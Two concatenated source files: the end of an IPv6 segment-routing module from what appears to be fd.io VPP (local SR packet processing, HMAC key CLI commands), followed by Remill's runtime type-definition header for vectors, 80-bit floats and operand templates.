(sr1->length + 1); copy_dst1[4] = copy_src1[4]; copy_dst1[3] = copy_src1[3]; copy_dst1[2] = copy_src1[2]; copy_dst1[1] = copy_src1[1]; copy_dst1[0] = copy_src1[0]; sr1 = 0; } do_trace1: if (PREDICT_FALSE (b1->flags & VLIB_BUFFER_IS_TRACED)) { sr_local_trace_t *tr = vlib_add_trace (vm, node, b1, sizeof (*tr)); clib_memcpy (tr->src.as_u8, ip1->src_address.as_u8, sizeof (tr->src.as_u8)); clib_memcpy (tr->dst.as_u8, ip1->dst_address.as_u8, sizeof (tr->dst.as_u8)); tr->length = vlib_buffer_length_in_chain (vm, b1); tr->next_index = next1; tr->sr_valid = sr1 != 0; if (tr->sr_valid) clib_memcpy (tr->sr, sr1, sizeof (tr->sr)); } vlib_validate_buffer_enqueue_x2 (vm, node, next_index, to_next, n_left_to_next, bi0, bi1, next0, next1); } while (n_left_from > 0 && n_left_to_next > 0) { u32 bi0; vlib_buffer_t *b0; ip6_header_t *ip0 = 0; ip6_sr_header_t *sr0; ip6_address_t *new_dst0; u32 next0 = SR_LOCAL_NEXT_IP6_LOOKUP; bi0 = from[0]; to_next[0] = bi0; from += 1; to_next += 1; n_left_from -= 1; n_left_to_next -= 1; b0 = vlib_get_buffer (vm, bi0); ip0 = vlib_buffer_get_current (b0); sr0 = (ip6_sr_header_t *) (ip0 + 1); if (PREDICT_FALSE (sr0->type != ROUTING_HEADER_TYPE_SR)) { next0 = SR_LOCAL_NEXT_ERROR; b0->error = node->errors[SR_LOCAL_ERROR_BAD_ROUTING_HEADER_TYPE]; goto do_trace; } /* Out of segments? Turf the packet */ if (PREDICT_FALSE (sr0->segments_left == 0)) { next0 = SR_LOCAL_NEXT_ERROR; b0->error = node->errors[SR_LOCAL_ERROR_NO_MORE_SEGMENTS]; goto do_trace; } if (PREDICT_FALSE (sm->validate_hmac)) { if (sr_validate_hmac (sm, ip0, sr0)) { next0 = SR_LOCAL_NEXT_ERROR; b0->error = node->errors[SR_LOCAL_ERROR_HMAC_INVALID]; goto do_trace; } } next0 = sr_local_cb ? sr_local_cb (vm, node, b0, ip0, sr0) : next0; /* * To suppress rewrite, return ~SR_LOCAL_NEXT_xxx */ if (PREDICT_FALSE (next0 & 0x80000000)) { next0 ^= 0xFFFFFFFF; if (PREDICT_FALSE (next0 == SR_LOCAL_NEXT_ERROR)) b0->error = node->errors[SR_LOCAL_ERROR_APP_CALLBACK]; } else { u32 segment_index0; segment_index0 = sr0->segments_left - 1; /* Rewrite the packet */ new_dst0 = (ip6_address_t *) (sr0->segments + segment_index0); ip0->dst_address.as_u64[0] = new_dst0->as_u64[0]; ip0->dst_address.as_u64[1] = new_dst0->as_u64[1]; if (PREDICT_TRUE (sr0->segments_left > 0)) sr0->segments_left -= 1; } /* End of the path. Clean up the SR header, or not */ if (PREDICT_FALSE (sr0->segments_left == 0 && (sr0->flags & clib_host_to_net_u16 (IP6_SR_HEADER_FLAG_CLEANUP)))) { u64 *copy_dst0, *copy_src0; u16 new_l0; /* * Copy the ip6 header right by the (real) length of the * sr header. Here's another place which assumes that * the sr header is the only extention header. */ ip0->protocol = sr0->protocol; vlib_buffer_advance (b0, (sr0->length + 1) * 8); new_l0 = clib_net_to_host_u16 (ip0->payload_length) - (sr0->length + 1) * 8; ip0->payload_length = clib_host_to_net_u16 (new_l0); copy_src0 = (u64 *) ip0; copy_dst0 = copy_src0 + (sr0->length + 1); copy_dst0[4] = copy_src0[4]; copy_dst0[3] = copy_src0[3]; copy_dst0[2] = copy_src0[2]; copy_dst0[1] = copy_src0[1]; copy_dst0[0] = copy_src0[0]; sr0 = 0; } do_trace: if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED)) { sr_local_trace_t *tr = vlib_add_trace (vm, node, b0, sizeof (*tr)); clib_memcpy (tr->src.as_u8, ip0->src_address.as_u8, sizeof (tr->src.as_u8)); clib_memcpy (tr->dst.as_u8, ip0->dst_address.as_u8, sizeof (tr->dst.as_u8)); tr->length = vlib_buffer_length_in_chain (vm, b0); tr->next_index = next0; tr->sr_valid = sr0 != 0; if (tr->sr_valid) clib_memcpy (tr->sr, sr0, sizeof (tr->sr)); } vlib_validate_buffer_enqueue_x1 (vm, node, next_index, to_next, n_left_to_next, bi0, next0); } vlib_put_next_frame (vm, node, next_index, n_left_to_next); } vlib_node_increment_counter (vm, sr_local_node.index, SR_LOCAL_ERROR_PKTS_PROCESSED, from_frame->n_vectors); return from_frame->n_vectors; } /* *INDENT-OFF* */ VLIB_REGISTER_NODE (sr_local_node, static) = { .function = sr_local, .name = "sr-local", /* Takes a vector of packets. */ .vector_size = sizeof (u32), .format_trace = format_sr_local_trace, .runtime_data_bytes = 0, .n_errors = SR_LOCAL_N_ERROR, .error_strings = sr_local_error_strings, .n_next_nodes = SR_LOCAL_N_NEXT, .next_nodes = { #define _(s,n) [SR_LOCAL_NEXT_##s] = n, foreach_sr_local_next #undef _ }, }; /* *INDENT-ON* */ VLIB_NODE_FUNCTION_MULTIARCH (sr_local_node, sr_local) ip6_sr_main_t *sr_get_main (vlib_main_t * vm) { vlib_call_init_function (vm, sr_init); ASSERT (sr_local_node.index); return &sr_main; } /** * @brief CLI parser for SR fix destination rewrite node * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * set_ip6_sr_rewrite_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { fib_prefix_t pfx = { .fp_proto = FIB_PROTOCOL_IP6, .fp_len = 128, }; u32 fib_index = 0; u32 fib_id = 0; u32 adj_index; ip_adjacency_t *adj; vnet_hw_interface_t *hi; u32 sw_if_index; ip6_sr_main_t *sm = &sr_main; vnet_main_t *vnm = vnet_get_main (); fib_node_index_t fei; if (!unformat (input, "%U", unformat_ip6_address, &pfx.fp_addr.ip6)) return clib_error_return (0, "ip6 address missing in '%U'", format_unformat_error, input); if (unformat (input, "rx-table-id %d", &fib_id)) { fib_index = fib_table_id_find_fib_index (FIB_PROTOCOL_IP6, fib_id); if (fib_index == ~0) return clib_error_return (0, "fib-id %d not found", fib_id); } fei = fib_table_lookup_exact_match (fib_index, &pfx); if (FIB_NODE_INDEX_INVALID == fei) return clib_error_return (0, "no match for %U", format_ip6_address, &pfx.fp_addr.ip6); adj_index = fib_entry_get_adj_for_source (fei, FIB_SOURCE_SR); if (ADJ_INDEX_INVALID == adj_index) return clib_error_return (0, "%U not SR sourced", format_ip6_address, &pfx.fp_addr.ip6); adj = adj_get (adj_index); if (adj->lookup_next_index != IP_LOOKUP_NEXT_REWRITE) return clib_error_return (0, "%U unresolved (not a rewrite adj)", format_ip6_address, &pfx.fp_addr.ip6); adj->rewrite_header.next_index = sm->ip6_rewrite_sr_next_index; sw_if_index = adj->rewrite_header.sw_if_index; hi = vnet_get_sup_hw_interface (vnm, sw_if_index); adj->rewrite_header.node_index = sr_fix_dst_addr_node.index; /* $$$$$ hack... steal the mcast group index */ adj->mcast_group_index = vlib_node_add_next (vm, sr_fix_dst_addr_node.index, hi->output_node_index); return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (set_ip6_sr_rewrite, static) = { .path = "set ip6 sr rewrite", .short_help = "set ip6 sr rewrite <ip6-address> [fib-id <id>]", .function = set_ip6_sr_rewrite_fn, }; /* *INDENT-ON* */ /** * @brief Register a callback routine to set next0 in sr_local * * @param cb void * */ void vnet_register_sr_app_callback (void *cb) { ip6_sr_main_t *sm = &sr_main; sm->sr_local_cb = cb; } /** * @brief Test routine for validation of HMAC */ static clib_error_t * test_sr_hmac_validate_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { ip6_sr_main_t *sm = &sr_main; if (unformat (input, "validate on")) sm->validate_hmac = 1; else if (unformat (input, "chunk-offset off")) sm->validate_hmac = 0; else return clib_error_return (0, "expected validate on|off in '%U'", format_unformat_error, input); vlib_cli_output (vm, "hmac signature validation %s", sm->validate_hmac ? "on" : "off"); return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (test_sr_hmac_validate, static) = { .path = "test sr hmac", .short_help = "test sr hmac validate [on|off]", .function = test_sr_hmac_validate_fn, }; /* *INDENT-ON* */ /** * @brief Add or Delete HMAC key * * @param sm ip6_sr_main_t * * @param key_id u32 * @param shared_secret u8 * * @param is_del u8 * * @return retval i32 */ // $$$ fixme shouldn't return i32 i32 sr_hmac_add_del_key (ip6_sr_main_t * sm, u32 key_id, u8 * shared_secret, u8 is_del) { u32 index; ip6_sr_hmac_key_t *key; if (is_del == 0) { /* Specific key in use? Fail. */ if (key_id && vec_len (sm->hmac_keys) > key_id && sm->hmac_keys[key_id].shared_secret) return -2; index = key_id; key = find_or_add_shared_secret (sm, shared_secret, &index); ASSERT (index == key_id); return 0; } /* delete */ if (key_id) /* delete by key ID */ { if (vec_len (sm->hmac_keys) <= key_id) return -3; key = sm->hmac_keys + key_id; hash_unset_mem (sm->hmac_key_by_shared_secret, key->shared_secret); vec_free (key->shared_secret); return 0; } index = 0; key = find_or_add_shared_secret (sm, shared_secret, &index); hash_unset_mem (sm->hmac_key_by_shared_secret, key->shared_secret); vec_free (key->shared_secret); return 0; } static clib_error_t * sr_hmac_add_del_key_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { ip6_sr_main_t *sm = &sr_main; u8 is_del = 0; u32 key_id = 0; u8 key_id_set = 0; u8 *shared_secret = 0; i32 rv; while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT) { if (unformat (input, "del")) is_del = 1; else if (unformat (input, "id %d", &key_id)) key_id_set = 1; else if (unformat (input, "key %s", &shared_secret)) { /* Do not include the trailing NULL byte. Guaranteed interop issue */ _vec_len (shared_secret) -= 1; } else break; } if (is_del == 0 && shared_secret == 0) return clib_error_return (0, "shared secret must be set to add a key"); if (shared_secret == 0 && key_id_set == 0) return clib_error_return (0, "shared secret and key id both unset"); rv = sr_hmac_add_del_key (sm, key_id, shared_secret, is_del); vec_free (shared_secret); switch (rv) { case 0: break; default: return clib_error_return (0, "sr_hmac_add_del_key returned %d", rv); } return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (sr_hmac, static) = { .path = "sr hmac", .short_help = "sr hmac [del] id <nn> key <str>", .function = sr_hmac_add_del_key_fn, }; /* *INDENT-ON* */ /** * @brief CLI parser for show HMAC key shared secrets * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * show_sr_hmac_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { ip6_sr_main_t *sm = &sr_main; int i; for (i = 1; i < vec_len (sm->hmac_keys); i++) { if (sm->hmac_keys[i].shared_secret) vlib_cli_output (vm, "[%d]: %v", i, sm->hmac_keys[i].shared_secret); } return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (show_sr_hmac, static) = { .path = "show sr hmac", .short_help = "show sr hmac", .function = show_sr_hmac_fn, }; /* *INDENT-ON* */ /** * @brief Test for SR debug flag * * @param vm vlib_main_t * * @param input unformat_input_t * * @param cmd vlib_cli_command_t * * * @return error clib_error_t * */ static clib_error_t * test_sr_debug_fn (vlib_main_t * vm, unformat_input_t * input, vlib_cli_command_t * cmd) { ip6_sr_main_t *sm = &sr_main; if (unformat (input, "on")) sm->is_debug = 1; else if (unformat (input, "off")) sm->is_debug = 0; else return clib_error_return (0, "expected on|off in '%U'", format_unformat_error, input); vlib_cli_output (vm, "debug trace now %s", sm->is_debug ? "on" : "off"); return 0; } /* *INDENT-OFF* */ VLIB_CLI_COMMAND (test_sr_debug, static) = { .path = "test sr debug", .short_help = "test sr debug on|off", .function = test_sr_debug_fn, }; /* *INDENT-ON* */ /* * fd.io coding-style-patch-verification: ON * * Local Variables: * eval: (c-set-style "gnu") * End: */
/* * Copyright (c) 2017 Trail of Bits, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #pragma once #include <cstdint> #include <cstring> #include <limits> #include <type_traits> #if defined(__GNUG__) && !defined(__clang__) # define COMPILING_WITH_GCC 1 #else # define COMPILING_WITH_GCC 0 #endif #pragma clang diagnostic push #pragma clang diagnostic fatal "-Wpadded" #include "remill/Arch/Runtime/Definitions.h" struct State; struct Memory; // Address in the source architecture type. We don't use a `uintptr_t` because // that might be specific to the destination architecture type. typedef uint32_t addr32_t; typedef uint64_t addr64_t; typedef IF_64BIT_ELSE(addr64_t, addr32_t) addr_t; typedef IF_64BIT_ELSE(int64_t, int32_t) addr_diff_t; #if defined(__x86_64__) || defined(__i386__) || defined(_M_X86) || \ defined(__arm__) typedef unsigned uint128_t __attribute__((mode(TI))); typedef int int128_t __attribute__((mode(TI))); #elif defined(__aarch64__) typedef __uint128_t uint128_t; typedef __int128_t int128_t; #elif defined(__sparc__) typedef __uint128_t uint128_t; typedef __int128_t int128_t; #else # error "Cannot determine (u)int128_t type of unuspported architecture." #endif static_assert(16 == sizeof(uint128_t), "Invalid `uint128_t` size."); static_assert(16 == sizeof(int128_t), "Invalid `int128_t` size."); typedef float float32_t; static_assert(4 == sizeof(float32_t), "Invalid `float32_t` size."); typedef double float64_t; static_assert(8 == sizeof(float64_t), "Invalid `float64_t` size."); typedef long double float128_t; // a long double can be anything from a 128-bit float (on AArch64/Linux) to a 64-bit double (AArch64 MacOS) // to an 80-bit precision wrapped with padding (x86/x86-64). We do not do a static assert on the size // since there are too many options. // A "native_float80_t" is a native type that is closes to approximating // an x86 80-bit float. // when building against CUDA, default to 64-bit float80s #if !defined(__CUDACC__) && (defined(__x86_64__) || defined(__i386__) || defined(_M_X86)) #if defined(__float80) typedef __float80 native_float80_t; #else typedef long double native_float80_t; #endif static_assert(10 <= sizeof(native_float80_t), "Invalid `native_float80_t` size."); #else typedef double native_float80_t; static_assert(8 == sizeof(native_float80_t), "Invalid `native_float80_t` size."); #endif static const int kEightyBitsInBytes = 10; union union_ld { struct { uint8_t data[kEightyBitsInBytes]; // when building against CUDA, default to 64-bit float80s #if !defined(__CUDACC__) && (defined(__x86_64__) || defined(__i386__) || defined(_M_X86)) // We are doing x86 on x86, so we have native x86 FP80s, but they // are not available in raw 80-bit native form. // // To get to the internal FP80 representation, we have to use a // `long double` which is (usually! but not always) // an FP80 padded to a 12 or 16 byte boundary // uint8_t padding[sizeof(native_float80_t) - kEightyBitsInBytes]; #else // The closest native FP type that we can easily deal with is a 64-bit double // this is less than the size of an FP80, so the data variable above will already // enclose it. No extra padding is needed #endif } lds __attribute__((packed)); native_float80_t ld; } __attribute__((packed)); struct float80_t final { uint8_t data[kEightyBitsInBytes]; inline ~float80_t(void) = default; inline float80_t(void) : data{0,} {} float80_t(const float80_t &) = default; float80_t &operator=(const float80_t &) = default; inline float80_t(native_float80_t ld) { union_ld ldu; std::memset(&ldu, 0, sizeof(ldu)); // zero out ldu to make padding consistent ldu.ld = ld; // assign native value // copy the representation to this object std::memcpy(&data[0], &ldu.lds.data[0], sizeof(data)); } operator native_float80_t() { union_ld ldu; std::memset(&ldu, 0, sizeof(ldu)); // zero out ldu to make padding consistent // copy the internal representation into the union std::memcpy(&ldu.lds.data[0], &data[0], sizeof(data)); // extract the native backing type from it return ldu.ld; } } __attribute__((packed)); union nan32_t { float32_t f; struct { uint32_t payload : 22; uint32_t is_quiet_nan : 1; uint32_t exponent : 8; uint32_t is_negative : 1; } __attribute__((packed)); } __attribute__((packed)); static_assert(sizeof(float32_t) == sizeof(nan32_t), "Invalid packing of `nan32_t`."); union nan64_t { float64_t d; struct { uint64_t payload : 51; uint64_t is_quiet_nan : 1; uint64_t exponent : 11; uint64_t is_negative : 1; } __attribute__((packed)); } __attribute__((packed)); static_assert(sizeof(float64_t) == sizeof(nan64_t), "Invalid packing of `nan64_t`."); union nan80_t { float80_t d; struct { uint64_t payload : 62; uint64_t is_quiet_nan : 1; uint64_t interger_bit : 1; uint64_t exponent : 15; uint64_t is_negative : 1; } __attribute__((packed)); } __attribute__((packed)); static_assert(sizeof(float80_t) == sizeof(nan80_t), "Invalid packing of `nan80_t`."); // Note: We are re-defining the `std::is_signed` type trait because we can't // always explicitly specialize it inside of the `std` namespace. template <typename T> struct is_signed { #ifdef __PIN__ static constexpr bool value = std::tr1::is_signed<T>::value; #else static constexpr bool value = std::is_signed<T>::value; #endif }; template <typename T> struct is_unsigned { #ifdef __PIN__ static constexpr bool value = std::tr1::is_unsigned<T>::value; #else static constexpr bool value = std::is_unsigned<T>::value; #endif }; template <> struct is_signed<int128_t> { static constexpr bool value = true; }; template <> struct is_unsigned<int128_t> { static constexpr bool value = false; }; template <> struct is_signed<uint128_t> { static constexpr bool value = false; }; template <> struct is_unsigned<uint128_t> { static constexpr bool value = true; }; template <typename T> struct VectorType; template <typename T> struct VectorType<T &> : public VectorType<T> {}; template <typename T> struct VectorType<const T> : public VectorType<T> {}; // Forward-declaration of basic vector types. union vec8_t; union vec16_t; union vec32_t; union vec64_t; union vec128_t; union vec256_t; union vec512_t; #define MAKE_VECTOR(base_type, prefix, nelems, vec_size_bits, width_bytes) \ struct prefix##v##nelems##_t final { \ base_type elems[nelems]; \ } __attribute__((packed)); \ \ static_assert(width_bytes == sizeof(prefix##v##nelems##_t), \ "Invalid definition of `" #prefix "v" #nelems "`."); \ \ static_assert((width_bytes * 8) == vec_size_bits, \ "Invalid definition of `" #prefix "v" #nelems "`."); \ \ template <> \ struct VectorType<prefix##v##nelems##_t> { \ enum : std::size_t { kNumElems = nelems }; \ typedef base_type BT; \ typedef base_type BaseType; \ typedef vec##vec_size_bits##_t T; \ typedef vec##vec_size_bits##_t Type; \ }; MAKE_VECTOR(uint8_t, uint8, 1, 8, 1) MAKE_VECTOR(uint8_t, uint8, 2, 16, 2) MAKE_VECTOR(uint8_t, uint8, 4, 32, 4) MAKE_VECTOR(uint8_t, uint8, 8, 64, 8) MAKE_VECTOR(uint8_t, uint8, 16, 128, 16) MAKE_VECTOR(uint8_t, uint8, 32, 256, 32) MAKE_VECTOR(uint8_t, uint8, 64, 512, 64) MAKE_VECTOR(uint16_t, uint16, 1, 16, 2) MAKE_VECTOR(uint16_t, uint16, 2, 32, 4) MAKE_VECTOR(uint16_t, uint16, 4, 64, 8) MAKE_VECTOR(uint16_t, uint16, 8, 128, 16) MAKE_VECTOR(uint16_t, uint16, 16, 256, 32) MAKE_VECTOR(uint16_t, uint16, 32, 512, 64) MAKE_VECTOR(uint32_t, uint32, 1, 32, 4) MAKE_VECTOR(uint32_t, uint32, 2, 64, 8) MAKE_VECTOR(uint32_t, uint32, 4, 128, 16) MAKE_VECTOR(uint32_t, uint32, 8, 256, 32) MAKE_VECTOR(uint32_t, uint32, 16, 512, 64) MAKE_VECTOR(uint64_t, uint64, 1, 64, 8) MAKE_VECTOR(uint64_t, uint64, 2, 128, 16) MAKE_VECTOR(uint64_t, uint64, 4, 256, 32) MAKE_VECTOR(uint64_t, uint64, 8, 512, 64) //MAKE_VECTOR(uint128_t, uint128, 0, 64, 8); MAKE_VECTOR(uint128_t, uint128, 1, 128, 16) MAKE_VECTOR(uint128_t, uint128, 2, 256, 32) MAKE_VECTOR(uint128_t, uint128, 4, 512, 64) MAKE_VECTOR(int8_t, int8, 1, 8, 1) MAKE_VECTOR(int8_t, int8, 2, 16, 2) MAKE_VECTOR(int8_t, int8, 4, 32, 4) MAKE_VECTOR(int8_t, int8, 8, 64, 8) MAKE_VECTOR(int8_t, int8, 16, 128, 16) MAKE_VECTOR(int8_t, int8, 32, 256, 32) MAKE_VECTOR(int8_t, int8, 64, 512, 64) MAKE_VECTOR(int16_t, int16, 1, 16, 2) MAKE_VECTOR(int16_t, int16, 2, 32, 4) MAKE_VECTOR(int16_t, int16, 4, 64, 8) MAKE_VECTOR(int16_t, int16, 8, 128, 16) MAKE_VECTOR(int16_t, int16, 16, 256, 32) MAKE_VECTOR(int16_t, int16, 32, 512, 64) MAKE_VECTOR(int32_t, int32, 1, 32, 4) MAKE_VECTOR(int32_t, int32, 2, 64, 8) MAKE_VECTOR(int32_t, int32, 4, 128, 16) MAKE_VECTOR(int32_t, int32, 8, 256, 32) MAKE_VECTOR(int32_t, int32, 16, 512, 64) MAKE_VECTOR(int64_t, int64, 1, 64, 8) MAKE_VECTOR(int64_t, int64, 2, 128, 16) MAKE_VECTOR(int64_t, int64, 4, 256, 32) MAKE_VECTOR(int64_t, int64, 8, 512, 64) //MAKE_VECTOR(int128_t, int128, 0, 64, 8); MAKE_VECTOR(int128_t, int128, 1, 128, 16) MAKE_VECTOR(int128_t, int128, 2, 256, 32) MAKE_VECTOR(int128_t, int128, 4, 512, 64) MAKE_VECTOR(float, float32, 1, 32, 4) MAKE_VECTOR(float, float32, 2, 64, 8) MAKE_VECTOR(float, float32, 4, 128, 16) MAKE_VECTOR(float, float32, 8, 256, 32) MAKE_VECTOR(float, float32, 16, 512, 64) MAKE_VECTOR(double, float64, 1, 64, 8); MAKE_VECTOR(double, float64, 2, 128, 16); MAKE_VECTOR(double, float64, 4, 256, 32); MAKE_VECTOR(double, float64, 8, 512, 64); #define NumVectorElems(val) \ static_cast<addr_t>(VectorType<decltype(val)>::kNumElems) #pragma clang diagnostic push #pragma clang diagnostic ignored "-Wunused-private-field" union vec8_t final { uint8v1_t bytes; int8v1_t sbytes; } __attribute__((packed)); static_assert(1 == sizeof(vec8_t), "Invalid structure packing of `vec8_t`."); union vec16_t final { uint8v2_t bytes; uint16v1_t words; int8v2_t sbytes; int16v1_t swords; } __attribute__((packed)); static_assert(2 == sizeof(vec16_t), "Invalid structure packing of `vec16_t`."); union vec32_t final { // Make this type look like an `[1 x i32]` to LLVM. This is important for // the cross-block alias analysis performed by remill-opt, as it enables // remill-opt to more easily handle false dependencies. uint32v1_t dwords; uint8v4_t bytes; uint16v2_t words; float32v1_t floats; int8v4_t sbytes; int16v2_t swords; int32v1_t sdwords; } __attribute__((packed)); static_assert(4 == sizeof(vec32_t), "Invalid structure packing of `vec32_t`."); union vec64_t final { // Make this type look like an `[1 x i64]` to LLVM. This is important for // the cross-block alias analysis performed by remill-opt, as it enables // remill-opt to more easily handle false dependencies. uint64v1_t qwords; uint8v8_t bytes; uint16v4_t words; uint32v2_t dwords; float32v2_t floats; float64v1_t doubles; int8v8_t sbytes; int16v4_t swords; int32v2_t sdwords; int64v1_t sqwords; } __attribute__((packed)); #pragma clang diagnostic pop static_assert(8 == sizeof(vec64_t), "Invalid structure packing of `vec64_t`."); union vec128_t final { // Make this type look like an `[1 x i128]` to LLVM. This is important for // the cross-block alias analysis performed by remill-opt, as it enables // remill-opt to more easily handle false dependencies. uint128v1_t dqwords; uint8v16_t bytes; uint16v8_t words; uint32v4_t dwords; uint64v2_t qwords; float32v4_t floats; float64v2_t doubles; int8v16_t sbytes; int16v8_t swords; int32v4_t sdwords; int64v2_t sqwords; int128v1_t sdqwords; } __attribute__((packed)); static_assert(16 == sizeof(vec128_t), "Invalid structure packing of `vec128_t`."); union vec256_t final { uint8v32_t bytes; uint16v16_t words; uint32v8_t dwords; uint64v4_t qwords; uint128v2_t dqwords; float32v8_t floats; float64v4_t doubles; int8v32_t sbytes; int16v16_t swords; int32v8_t sdwords; int64v4_t sqwords; int128v2_t sdqwords; } __attribute__((packed)); static_assert(32 == sizeof(vec256_t), "Invalid structure packing of `vec256_t`."); union vec512_t final { uint8v64_t bytes; uint16v32_t words; uint32v16_t dwords; uint64v8_t qwords; uint128v4_t dqwords; float32v16_t floats; float64v8_t doubles; int8v64_t sbytes; int16v32_t swords; int32v16_t sdwords; int64v8_t sqwords; int128v4_t sdqwords; } __attribute__((packed)); static_assert(64 == sizeof(vec512_t) && 64 == sizeof(vec512_t().bytes) && 64 == sizeof(vec512_t().words) && 64 == sizeof(vec512_t().dwords) && 64 == sizeof(vec512_t().qwords) && 64 == sizeof(vec512_t().dqwords) && 64 == sizeof(vec512_t().floats) && 64 == sizeof(vec512_t().doubles), "Invalid structure packing of `vec512_t`."); // An n-bit memory reference. This is implemented as an `addr_t`. Part of the // reason is because pointers have sizes that are architecture-specific, and // because we want to be able to pass the address through an integer register // and only access the addressed memory if/when needed. template <typename T> struct Mn final { addr_t addr; }; template <typename T> struct MVn final { addr_t addr; }; template <typename T> struct MnW final { addr_t addr; }; template <typename T> struct MVnW final { addr_t addr; }; template <typename T, bool = sizeof(T) <= sizeof(addr_t)> struct Rn; // Note: We use `addr_t` as the internal type for `Rn` and `In` struct templates // because this will be the default register size used for parameter // passing in the underlying ABI that Clang chooses to use when converting // this code to bitcode. We want to avoid the issue where a size that's // too small, e.g. `uint8_t` or `uint16_t` in a struct, is passed as an // aligned pointer to a `byval` parameter. template <typename T> struct Rn<T, true> final { const addr_t val; }; template <typename T> struct Rn<T, false> final { const T val; }; template <typename T> struct RnW final { T *const val_ref; }; template <> struct Rn<float32_t> final { const float32_t val; }; template <> struct Rn<float64_t> final { const float64_t val; }; template <> struct Rn<float80_t> final { const float80_t val; }; template <> struct RnW<float32_t> final { float32_t *const val_ref; }; template <> struct RnW<float64_t> final { float64_t *const val_ref; }; template <typename T> struct In final { const addr_t val; }; // Okay so this is *kind of* a hack. The idea is that, in some cases, we want // to pass things like 32- or 64-bit GPRs to instructions taking in vectors, // and so it would be nice if those values could masquerade as vectors, even // though the translator will pass in registers. template <typename T> struct RVn; template <> struct RVn<vec64_t> final { const uint64_t val; // Must be 64 bits. }; template <> struct RVn<vec32_t> final { const addr_t val; // Scales to "natural" machine word length. }; template <> struct RVn<vec16_t> final { const addr_t val; // Scales to "natural" machine word length. }; template <> struct RVn<vec8_t> final { const addr_t val; // Scales to "natural" machine word length. }; template <typename T> struct RVnW; template <> struct RVnW<vec32_t> final { uint32_t *const val_ref; }; template <> struct RVnW<vec64_t> final { uint64_t *const val_ref; }; // A `void` pointer is used so that we can treat different vector types // uniformly (from the LLVM bitcode side). That is, the type of value passed // in may be a pointer to a wider vector than was is specified by `T`. template <typename T> struct Vn final { const void *const val; }; template <typename T> struct VnW final { void *const val_ref; }; // Used to figure out the "base type" of an aggregate type (e.g. vector of BT) // or of an integral/float type. template <typename T> struct BaseType { typedef T BT; }; template <typename T> struct BaseType<volatile T> : public BaseType<T> {}; template <typename T> struct BaseType<const T> : public BaseType<T> {}; template <typename T> struct BaseType<T &> : public BaseType<T> {}; template <typename T> struct BaseType<T *> : public BaseType<T> {}; template <typename T> struct BaseType<Mn<T>> : public BaseType<T> {}; template <typename T> struct BaseType<MnW<T>> : public BaseType<T> {}; template <typename T> struct BaseType<MVn<T>> : public BaseType<T> {}; template <typename T> struct BaseType<MVnW<T>> : public BaseType<T> {}; template <typename T> struct BaseType<Rn<T>> : public BaseType<T> {}; template <typename T> struct BaseType<RnW<T>> : public BaseType<T> {}; template <typename T> struct BaseType<In<T>> : public BaseType<T> {}; template <typename T> struct BaseType<Vn<T>> : public BaseType<T> {}; template <typename T> struct BaseType<VnW<T>> : public BaseType<T> {}; template <typename T> struct BaseType<RVn<T>> : public BaseType<T> {}; template <typename T> struct BaseType<RVnW<T>> : public BaseType<T> {}; template <typename T> struct NextLargerIntegerType; template <typename T> struct NextSmallerIntegerType; template <typename T> struct SignedIntegerType; template <typename T> struct UnsignedIntegerType; #define MAKE_SIGNED_INT_CHANGERS(signed_type, unsigned_type) \ static_assert(sizeof(signed_type) == sizeof(unsigned_type), \ "Invalid int changer type type."); \ static_assert( \ is_signed<signed_type>::value != is_signed<unsigned_type>::value, \ "Sign match between int type and next int type."); \ template <> \ struct SignedIntegerType<unsigned_type> { \ typedef signed_type BT; \ }; \ template <> \ struct SignedIntegerType<signed_type> { \ typedef signed_type BT; \ }; \ template <> \ struct UnsignedIntegerType<signed_type> { \ typedef unsigned_type BT; \ }; \ template <> \ struct UnsignedIntegerType<unsigned_type> { \ typedef unsigned_type BT; \ }; #define MAKE_INT_TYPE(cur, next) \ static_assert(sizeof(next) == (2 * sizeof(cur)), "Invalid next int type."); \ static_assert(is_signed<cur>::value == is_signed<next>::value, \ "Sign mismatch between int type and next int type."); \ template <> \ struct NextLargerIntegerType<cur> { \ typedef next BT; \ }; \ template <> \ struct NextSmallerIntegerType<next> { \ typedef cur BT; \ }; MAKE_SIGNED_INT_CHANGERS(int8_t, uint8_t) MAKE_SIGNED_INT_CHANGERS(int16_t, uint16_t) MAKE_SIGNED_INT_CHANGERS(int32_t, uint32_t) MAKE_SIGNED_INT_CHANGERS(int64_t, uint64_t) MAKE_SIGNED_INT_CHANGERS(int128_t, uint128_t) MAKE_INT_TYPE(int8_t, int16_t) MAKE_INT_TYPE(uint8_t, uint16_t) MAKE_INT_TYPE(int16_t, int32_t) MAKE_INT_TYPE(uint16_t, uint32_t) MAKE_INT_TYPE(int32_t, int64_t) MAKE_INT_TYPE(uint32_t, uint64_t) MAKE_INT_TYPE(int64_t, int128_t) MAKE_INT_TYPE(uint64_t, uint128_t) static_assert(sizeof(NextLargerIntegerType<uint8_t>::BT) == 2, "Bad type."); static_assert(sizeof(NextLargerIntegerType<uint16_t>::BT) == 4, "Bad type."); static_assert(sizeof(NextLargerIntegerType<uint32_t>::BT) == 8, "Bad type."); static_assert(sizeof(NextLargerIntegerType<uint64_t>::BT) == 16, "Bad type."); static_assert(sizeof(NextSmallerIntegerType<uint16_t>::BT) == 1, "Bad type."); static_assert(sizeof(NextSmallerIntegerType<uint32_t>::BT) == 2, "Bad type."); 